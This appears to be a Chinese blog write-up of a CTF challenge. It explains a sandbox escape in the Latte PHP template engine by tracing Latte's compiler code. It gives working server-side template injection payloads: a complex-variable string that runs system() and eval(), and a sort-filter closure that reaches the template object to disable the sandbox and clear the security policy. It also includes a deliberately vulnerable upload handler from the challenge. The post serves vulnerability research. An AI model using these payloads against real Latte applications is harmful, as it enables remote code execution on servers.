<!DOCTYPE html>
<html lang="en" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="keywords" content="" />
  <meta name="author" content="Siebene@" />
  <meta name="description" content="" />
  
  
  <title>
    
      Latte-SSTI-Payloads 
      
      
      |
    
     Siebene@ Blog
  </title>

  
    <link rel="apple-touch-icon" href="/images/favicon.png">
    <link rel="icon" href="/images/favicon.png">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  <link rel="stylesheet" href="/css/main.css" />
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css" />
  <!-- 代码块风格 -->
  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<meta name="generator" content="Hexo 6.2.0"></head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/avatar.png" alt="">
      
    </a>
    <div class="nickname"><a href="/">Siebene@</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">Archives</a>
        </li>
      
        <li class="nav-item" data-path="/tags/">
          <a href="/tags/">Tags</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">About</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


  <!-- LaTex Display -->

  
    <script async type="text/javascript" src="/plugins/mathjax/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>





  <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>







  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">Latte-SSTI-Payloads</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime mr-10" title="Update time"></i>
          2021-11-22 14:33:37
        </span>
        
              <span class="post-tags">
                <i class="iconfont icon-tags mr-10" title="Tags"></i>
                
                <span class="span--tag mr-8">
                  <a href="/tags/WEB/" title="WEB">
                    #WEB
                  </a>
                </span>
                
              </span>
          
      </div>
      <div class="markdown-body">
        <h2 id="TL-DR"><a href="#TL-DR" class="headerlink" title="TL;DR"></a><em>TL;DR</em></h2><p>最近西湖论剑有一道使用Latte的题目，当时我也是用的偷鸡办法做的，当时时间限制就没有仔仔细细的去寻找逃逸的办法。</p>
<p>直到赛后我发现逃逸的办法很简单</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;=&quot;$&#123;system(&#x27;nl /flag&#x27;)&#125;&quot;&#125;</span><br></pre></td></tr></table></figure>

<p>这里使用的是php的基础语法，我就不过多赘述了。这个复杂变量网上也有很多文章。</p>
<p>赛后我无聊的时候简单看了下Latte，找了点后续的利用，比如获取$this变量，还有任意代码执行。然后发现网上关于这个引擎的文章很少，就来水一篇吧。</p>
<h2 id="”-“-Bypass"><a href="#”-“-Bypass" class="headerlink" title="”${}“ Bypass"></a>”${}“ Bypass</h2><p>我粗略的读了下Latte，其实Latte确实是对$$和${}进行了检测的</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//PhpWriter.php</span></span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">sandboxPass</span>(<span class="params">MacroTokens <span class="variable">$tokens</span></span>): <span class="title">MacroTokens</span></span>&#123;</span><br><span class="line">......</span><br><span class="line"><span class="keyword">elseif</span> (<span class="variable">$tokens</span>-&gt;<span class="title function_ invoke__">isCurrent</span>(<span class="string">&#x27;$&#x27;</span>)) &#123; <span class="comment">// $$$var or $&#123;...&#125;</span></span><br><span class="line">				<span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">CompileException</span>(<span class="string">&#x27;Forbidden variable variables.&#x27;</span>);</span><br><span class="line"></span><br><span class="line">	&#125;</span><br><span class="line">......</span><br><span class="line"><span class="keyword">else</span> &#123; <span class="comment">// $obj-&gt;$$$var or $obj::$$$var</span></span><br><span class="line">		<span class="variable">$member</span> = <span class="variable">$tokens</span>-&gt;<span class="title function_ invoke__">nextAll</span>(<span class="variable">$tokens</span>::<span class="variable constant_">T_VARIABLE</span>, <span class="string">&#x27;$&#x27;</span>);</span><br><span class="line">		<span class="variable">$expr</span>-&gt;tokens = <span class="variable">$op</span> === <span class="string">&#x27;::&#x27;</span> &amp;&amp; !<span class="variable">$tokens</span>-&gt;<span class="title function_ invoke__">isNext</span>(<span class="string">&#x27;(&#x27;</span>)</span><br><span class="line">		? <span class="title function_ invoke__">array_merge</span>(<span class="variable">$expr</span>-&gt;tokens, <span class="title function_ invoke__">array_slice</span>(<span class="variable">$member</span>, <span class="number">1</span>))</span><br><span class="line">		: <span class="title function_ invoke__">array_merge</span>(<span class="variable">$expr</span>-&gt;tokens, <span class="variable">$member</span>);</span><br><span class="line">	 &#125;</span><br><span class="line"></span><br><span class="line">......</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>从给的注释和报错的异常也能看出来，这里通过前面的词法，语法分析出来的token在检测形容${},$$var这样的结构。</p>
<p>如果你直接在模板里书写${$xx}确实会报上面哪个异常</p>
<p>但是如果使用”${xxx}”，可能在前面词法，语法分析就会认为这是个定义的字符串，根本不会进入这里的sandboxPass方法了</p>
<p>可以从一个尽量精简的例子来看看后续的流程</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">//这是index.php</span></span><br><span class="line"><span class="keyword">require</span> <span class="string">&#x27;vendor/autoload.php&#x27;</span>;</span><br><span class="line"><span class="variable">$latte</span> = <span class="keyword">new</span> <span class="title class_">Latte\Engine</span>;</span><br><span class="line"><span class="variable">$latte</span>-&gt;<span class="title function_ invoke__">setTempDirectory</span>(<span class="string">&#x27;tempdir&#x27;</span>);</span><br><span class="line"><span class="variable">$policy</span> = <span class="keyword">new</span> <span class="title class_">Latte\Sandbox\SecurityPolicy</span>;</span><br><span class="line"><span class="variable">$policy</span>-&gt;<span class="title function_ invoke__">allowMacros</span>([<span class="string">&#x27;block&#x27;</span>, <span class="string">&#x27;if&#x27;</span>, <span class="string">&#x27;else&#x27;</span>,<span class="string">&#x27;=&#x27;</span>]);</span><br><span class="line"><span class="variable">$policy</span>-&gt;<span class="title function_ invoke__">allowFilters</span>(<span class="variable">$policy</span>::<span class="variable constant_">ALL</span>);</span><br><span class="line"><span class="variable">$policy</span>-&gt;<span class="title function_ invoke__">allowFunctions</span>([<span class="string">&#x27;trim&#x27;</span>, <span class="string">&#x27;strlen&#x27;</span>]);</span><br><span class="line"><span class="variable">$latte</span>-&gt;<span class="title function_ invoke__">setPolicy</span>(<span class="variable">$policy</span>);</span><br><span class="line"><span class="variable">$latte</span>-&gt;<span class="title function_ invoke__">setSandboxMode</span>();</span><br><span class="line"><span class="variable">$latte</span>-&gt;<span class="title function_ invoke__">setAutoRefresh</span>(<span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_FILES</span>[<span class="string">&#x27;file&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$uploaddir</span> = <span class="string">&#x27;/var/www/html/tempdir/&#x27;</span>;</span><br><span class="line">    <span class="variable">$filename</span> = <span class="title function_ invoke__">basename</span>(<span class="variable">$_FILES</span>[<span class="string">&#x27;file&#x27;</span>][<span class="string">&#x27;name&#x27;</span>]);</span><br><span class="line">    <span class="keyword">if</span>(<span class="title function_ invoke__">stristr</span>(<span class="variable">$filename</span>,<span class="string">&#x27;p&#x27;</span>) <span class="keyword">or</span> <span class="title function_ invoke__">stristr</span>(<span class="variable">$filename</span>,<span class="string">&#x27;h&#x27;</span>) <span class="keyword">or</span> <span class="title function_ invoke__">stristr</span>(<span class="variable">$filename</span>,<span class="string">&#x27;..&#x27;</span>))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&#x27;no&#x27;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="variable">$file_conents</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$_FILES</span>[<span class="string">&#x27;file&#x27;</span>][<span class="string">&#x27;tmp_name&#x27;</span>]);</span><br><span class="line">    <span class="keyword">if</span>(<span class="title function_ invoke__">strlen</span>(<span class="variable">$file_conents</span>)&gt;<span class="number">28</span> <span class="keyword">or</span> <span class="title function_ invoke__">stristr</span>(<span class="variable">$file_conents</span>,<span class="string">&#x27;&lt;&#x27;</span>))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&#x27;no&#x27;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="variable">$uploadfile</span> = <span class="variable">$uploaddir</span> . <span class="variable">$filename</span>;</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$_FILES</span>[<span class="string">&#x27;file&#x27;</span>][<span class="string">&#x27;tmp_name&#x27;</span>], <span class="variable">$uploadfile</span>)) &#123;</span><br><span class="line">        <span class="variable">$message</span> = <span class="variable">$filename</span> .<span class="string">&quot; was successfully uploaded.&quot;</span>;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="variable">$message</span> = <span class="string">&quot;error!&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="variable">$params</span> = [</span><br><span class="line">        <span class="string">&#x27;message&#x27;</span> =&gt; <span class="variable">$message</span>,</span><br><span class="line">    ];</span><br><span class="line">    <span class="variable">$latte</span>-&gt;<span class="title function_ invoke__">render</span>(<span class="string">&#x27;tempdir/index.latte&#x27;</span>, <span class="variable">$params</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span> <span class="keyword">if</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;source&#x27;</span>]==<span class="number">1</span>)&#123;</span><br><span class="line">    <span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="variable">$latte</span>-&gt;<span class="title function_ invoke__">render</span>(<span class="string">&#x27;tempdir/index.latte&#x27;</span>, [<span class="string">&#x27;message&#x27;</span>=&gt;<span class="string">&#x27;Hellow My Glzjin!&#x27;</span>]);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>



<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*这是index.latte*/</span></span><br><span class="line">&lt;ul&gt;</span><br><span class="line">	&#123;=<span class="string">&quot;$&#123;eval(&#x27;echo \&#x27;pwn!\&#x27;;&#x27;)&#125;&quot;</span>&#125;	</span><br><span class="line">&lt;/ul&gt;</span><br></pre></td></tr></table></figure>

<p><img src="/2021/11/22/Latte-SSTI-Payloads/1.png" alt="1"></p>
<p>调用栈张这样，光从名字来看应该还是挺清晰的</p>
<p>主要看看buildClassBody方法</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> <span class="function"><span class="keyword">function</span> <span class="title">buildClassBody</span>(<span class="params"><span class="keyword">array</span> <span class="variable">$tokens</span></span>)</span>&#123;</span><br><span class="line">......</span><br><span class="line"><span class="variable">$macroHandlers</span> = <span class="keyword">new</span> <span class="title class_">\SplObjectStorage</span>;</span><br><span class="line"></span><br><span class="line">		<span class="keyword">if</span> (<span class="variable language_">$this</span>-&gt;macros) &#123;</span><br><span class="line">			<span class="title function_ invoke__">array_map</span>([<span class="variable">$macroHandlers</span>, <span class="string">&#x27;attach&#x27;</span>], <span class="title function_ invoke__">array_merge</span>(...<span class="title function_ invoke__">array_values</span>(<span class="variable">$this</span>-&gt;macros)));</span><br><span class="line">		&#125;</span><br><span class="line"></span><br><span class="line">		<span class="keyword">foreach</span> (<span class="variable">$macroHandlers</span> <span class="keyword">as</span> <span class="variable">$handler</span>) &#123;</span><br><span class="line">			<span class="variable">$handler</span>-&gt;<span class="title function_ invoke__">initialize</span>(<span class="variable">$this</span>);</span><br><span class="line">		&#125;</span><br><span class="line"></span><br><span class="line">		<span class="keyword">foreach</span> (<span class="variable">$tokens</span> <span class="keyword">as</span> <span class="variable language_">$this</span>-&gt;position =&gt; <span class="variable">$token</span>) &#123;</span><br><span class="line">			<span class="keyword">if</span> (<span class="variable language_">$this</span>-&gt;inHead &amp;&amp; !(</span><br><span class="line">				<span class="variable">$token</span>-&gt;type === <span class="variable">$token</span>::<span class="variable constant_">COMMENT</span></span><br><span class="line">				|| <span class="variable">$token</span>-&gt;type === <span class="variable">$token</span>::<span class="variable constant_">MACRO_TAG</span> &amp;&amp; (<span class="variable language_">$this</span>-&gt;flags[<span class="variable">$token</span>-&gt;name] ?? <span class="literal">null</span>) &amp; <span class="title class_">Macro</span>::<span class="variable constant_">ALLOWED_IN_HEAD</span></span><br><span class="line">				|| <span class="variable">$token</span>-&gt;type === <span class="variable">$token</span>::<span class="variable constant_">TEXT</span> &amp;&amp; <span class="title function_ invoke__">trim</span>(<span class="variable">$token</span>-&gt;text) === <span class="string">&#x27;&#x27;</span></span><br><span class="line">			)) &#123;</span><br><span class="line">				<span class="variable language_">$this</span>-&gt;inHead = <span class="literal">false</span>;</span><br><span class="line">			&#125;</span><br><span class="line">			<span class="variable language_">$this</span>-&gt;&#123;<span class="string">&quot;process<span class="subst">$token</span>-&gt;type&quot;</span>&#125;(<span class="variable">$token</span>);</span><br><span class="line">		&#125;</span><br><span class="line">......</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>在上面哪个示范中，$this-&gt;{“process$token-&gt;type”}($token);当$token-&gt;type&#x3D;MacroTag时，调用的就是$this-&gt;processMacroTag($token);</p>
<p>主要来看看这个MacroTag的处理过程，因为这个MacroTag就代表<code>&#123;=&quot;$&#123;eval(&#39;echo \&#39;pwn!\&#39;;&#39;)&#125;&quot;&#125;	</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> <span class="function"><span class="keyword">function</span> <span class="title">processMacroTag</span>(<span class="params">Token <span class="variable">$token</span></span>): <span class="title">void</span></span>&#123;</span><br><span class="line">......</span><br><span class="line"><span class="comment">//对于这个标签，因为情况比较简单，直接就是来到这里</span></span><br><span class="line"><span class="variable">$node</span> = <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">openMacro</span>(<span class="variable">$token</span>-&gt;name, <span class="variable">$token</span>-&gt;value, <span class="variable">$token</span>-&gt;modifiers, <span class="variable">$isRightmost</span>);</span><br><span class="line">......</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">openMacro</span>(<span class="params"></span></span></span><br><span class="line"><span class="params"><span class="function">		<span class="keyword">string</span> <span class="variable">$name</span>,</span></span></span><br><span class="line"><span class="params"><span class="function">		<span class="keyword">string</span> <span class="variable">$args</span> = <span class="string">&#x27;&#x27;</span>,</span></span></span><br><span class="line"><span class="params"><span class="function">		<span class="keyword">string</span> <span class="variable">$modifiers</span> = <span class="string">&#x27;&#x27;</span>,</span></span></span><br><span class="line"><span class="params"><span class="function">		<span class="keyword">bool</span> <span class="variable">$isRightmost</span> = <span class="literal">false</span>,</span></span></span><br><span class="line"><span class="params"><span class="function">		<span class="keyword">string</span> <span class="variable">$nPrefix</span> = <span class="literal">null</span></span></span></span><br><span class="line"><span class="params"><span class="function">	</span>): <span class="title">MacroNode</span> </span>&#123;</span><br><span class="line">	......</span><br><span class="line">	<span class="variable">$node</span> = <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">expandMacro</span>(<span class="variable">$name</span>, <span class="variable">$args</span>, <span class="variable">$modifiers</span>, <span class="variable">$nPrefix</span>);</span><br><span class="line">	......</span><br><span class="line">	&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">expandMacro</span>(<span class="params"><span class="keyword">string</span> <span class="variable">$name</span>, <span class="keyword">string</span> <span class="variable">$args</span>, <span class="keyword">string</span> <span class="variable">$modifiers</span> = <span class="string">&#x27;&#x27;</span>, <span class="keyword">string</span> <span class="variable">$nPrefix</span> = <span class="literal">null</span></span>): <span class="title">MacroNode</span></span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="keyword">empty</span>(<span class="variable language_">$this</span>-&gt;macros[<span class="variable">$name</span>]))&#123;<span class="comment">//先判断是否存在这个macros</span></span><br><span class="line">        ......</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="variable">$modifiers</span> = (<span class="keyword">string</span>) <span class="variable">$modifiers</span>;<span class="comment">//获取修饰符 感觉就是类似|过滤器吧</span></span><br><span class="line">    .......</span><br><span class="line">    .......</span><br><span class="line">    <span class="keyword">foreach</span> (<span class="title function_ invoke__">array_reverse</span>(<span class="variable">$this</span>-&gt;macros[<span class="variable">$name</span>]) <span class="keyword">as</span> <span class="variable">$macro</span>) &#123;</span><br><span class="line">			<span class="variable">$node</span> = <span class="keyword">new</span> <span class="title class_">MacroNode</span>(<span class="variable">$macro</span>, <span class="variable">$name</span>, <span class="variable">$args</span>, <span class="variable">$modifiers</span>, <span class="variable language_">$this</span>-&gt;macroNode, <span class="variable language_">$this</span>-&gt;htmlNode, <span class="variable">$nPrefix</span>);<span class="comment">//前面一堆蜜汁操作（因为调的时候前面很多分支没进入，就不管了），终于开始建立这个节点</span></span><br><span class="line">			<span class="variable">$node</span>-&gt;context = <span class="variable">$context</span>;</span><br><span class="line">			<span class="variable">$node</span>-&gt;startLine = <span class="variable">$nPrefix</span> ? <span class="variable language_">$this</span>-&gt;htmlNode-&gt;startLine : <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">getLine</span>();</span><br><span class="line">			<span class="keyword">if</span> (<span class="variable">$macro</span>-&gt;<span class="title function_ invoke__">nodeOpened</span>(<span class="variable">$node</span>) !== <span class="literal">false</span>) &#123;</span><br><span class="line">				<span class="keyword">return</span> <span class="variable">$node</span>;</span><br><span class="line">			&#125;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>来到MacroSet的nodeOpened（这里是CoreMacros继承的MacroSet方法）然后调用了MacroSet的compile方法，对于本例会来到CoreMacros的macroExpr，通过这个方法上面的注释也能明白这里是在准备编译表达式，在准备将表达式打印的语句编译出来。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="title function_ invoke__">nodeOpened</span>(MacroNode <span class="variable">$node</span>) -&gt; <span class="title function_ invoke__">compile</span>(MacroNode <span class="variable">$node</span>, <span class="variable">$def</span>)-&gt;<span class="title function_ invoke__">macroExpr</span>(MacroNode <span class="variable">$node</span>, PhpWriter <span class="variable">$writer</span>)</span><br></pre></td></tr></table></figure>

<p>然后来到PhpWriter的write方法</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * Expands %node.word, %node.array, %node.args, %node.line, %escape(), %modify(), %var, %raw, %word in code.</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@param</span>  mixed  ...$args</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">write</span>(<span class="params"><span class="keyword">string</span> <span class="variable">$mask</span>, ...<span class="variable">$args</span></span>): <span class="title">string</span></span></span><br><span class="line"><span class="function">   ......</span></span><br><span class="line"><span class="function">//这整个<span class="title">PhpWriter</span>其实都在干一件事就是去生成一个类似于格式化字符串的结果</span></span><br><span class="line"><span class="function">   //对于本例，当格式化参数的时候，会一路调用到<span class="title">PhpWriter</span>的<span class="title">sandboxPass</span>方法</span></span><br></pre></td></tr></table></figure>

<p>在PhpWriter的sandboxPass方法中，会根据目前他拿到的tokens来做判断（虽然初始化PhpWriter的时候，传给他的tokens属性的变量叫tokenizer，实际上传过去的是是当时哪个节点对于分词器的一个包装）</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">....</span><br><span class="line"><span class="keyword">elseif</span> (<span class="variable">$tokens</span>-&gt;<span class="title function_ invoke__">isCurrent</span>(<span class="string">&#x27;$&#x27;</span>)) &#123; <span class="comment">// $$$var or $&#123;...&#125;</span></span><br><span class="line">				<span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">CompileException</span>(<span class="string">&#x27;Forbidden variable variables.&#x27;</span>);</span><br><span class="line">....</span><br></pre></td></tr></table></figure>

<p><img src="/2021/11/22/Latte-SSTI-Payloads/2.png" alt="2"></p>
<p>可以看到这里如果使用$tokens-&gt;isCurrent(‘$’)自然而然获取到的是<code>&quot;$&#123;eval(xxxxxx)&#125;&quot;</code>并不是一个<code>$</code>的token。</p>
<p>所以就绕过了sandbox。</p>
<p><strong>底层的原理也很简单，其实就是Latte的解析并没有与php一致。也就是说Latte认为这就是在输出一个字符串而已，但是最后生成的php文件中，这确实是一个符合语法规则的复杂变量。</strong></p>
<h2 id="How-to-get-this"><a href="#How-to-get-this" class="headerlink" title="How to get $this"></a>How to get $this</h2><p>模板沙盒逃逸一般大家第一步都喜欢去寻找一些内置变量一类，看看有没有什么操作的空间。但是Latte我粗略的看了下官方文档，好像没有内置变量。直接使用$this会直接被ban。</p>
<p>这里我当时看到了一个过滤器<strong>sort</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">You can pass your own comparison <span class="function"><span class="keyword">function</span> <span class="title">as</span> <span class="title">a</span> <span class="title">parameter</span>:</span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function"></span>&#123;<span class="keyword">var</span> <span class="variable">$sorted</span> = (<span class="variable">$names</span>|sort: <span class="function"><span class="keyword">fn</span>(<span class="params"><span class="variable">$a</span>, <span class="variable">$b</span></span>) =&gt;</span> <span class="variable">$b</span> &lt;=&gt; <span class="variable">$a</span>)&#125;</span><br><span class="line"><span class="comment">//这是官方的例子</span></span><br></pre></td></tr></table></figure>

<p>这样的东西看起来就很危险，而且最后是会编译成php文件的，所以我猜测自定义匿名函数的代码片段最后生成到php文件时不会产生太大的变化。我当时试了试在匿名函数里面定义一个没用的变量。在最后编译生成的php文件里，我也确实看到了我定义的变量。所以我就觉得这个地方是有操作空间的。</p>
<p>如果你直接准备再这里进行函数调用会被直接拦下来的，静态调用过不了编译。动态调用因为上文提到的sandboxPass方法，会进行以下转换比如</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="title function_ invoke__">trim</span>(<span class="string">&quot;phpinfo\t&quot;</span>)();  =&gt; <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">call</span>(<span class="title function_ invoke__">trim</span>(<span class="string">&quot;phpinfo\t&quot;</span>))();</span><br></pre></td></tr></table></figure>

<p>其中$this变量是一个Latte\Runtime\Template的对象，他的这个call其实就是在检测白名单，并且适配了php的几种动态调用的形式，比如数组之类的。</p>
<p>我水平有限也无法规避Latte对动态调用这样的转换。（可能可以使用类似mxss的思路去规避?）</p>
<p>所以我就还是准备使用”${}”看看能否获得$this变量</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">  &lt;li&gt;&#123;=[<span class="string">&quot;this&quot;</span>,<span class="string">&quot;siebene&quot;</span>]|sort: <span class="function"><span class="keyword">function</span> (<span class="params"><span class="variable">$a</span>,<span class="variable">$b</span></span>)  </span>&#123;  </span><br><span class="line"></span><br><span class="line">	<span class="string">&quot;$&#123;is_string($<span class="subst">&#123;$a&#125;</span>-&gt;getEngine()-&gt;setSandboxMode(false))&#125;&quot;</span>;</span><br><span class="line">	<span class="string">&quot;$&#123;is_string($<span class="subst">&#123;$a&#125;</span>-&gt;getEngine()-&gt;setPolicy(null))&#125;&quot;</span>;</span><br><span class="line"></span><br><span class="line">&#125;&#125;&lt;/li&gt;</span><br><span class="line">   <span class="comment">/*</span></span><br><span class="line"><span class="comment">   这里有个小细节就是为了避免对象转为字符串报致命错误提前中断，我使用了`is_string`来将对象间接转成可以接受的形式。</span></span><br><span class="line"><span class="comment">   */</span></span><br></pre></td></tr></table></figure>

<p>发现还是挺简单的，我就拿到了$this变量，并且关闭了沙盒还有清空了策略。</p>
<h2 id="Another-RCE-Payloads"><a href="#Another-RCE-Payloads" class="headerlink" title="Another RCE Payloads"></a>Another RCE Payloads</h2><p>有兴趣看的话，感觉payload应该还是会有挺多的</p>
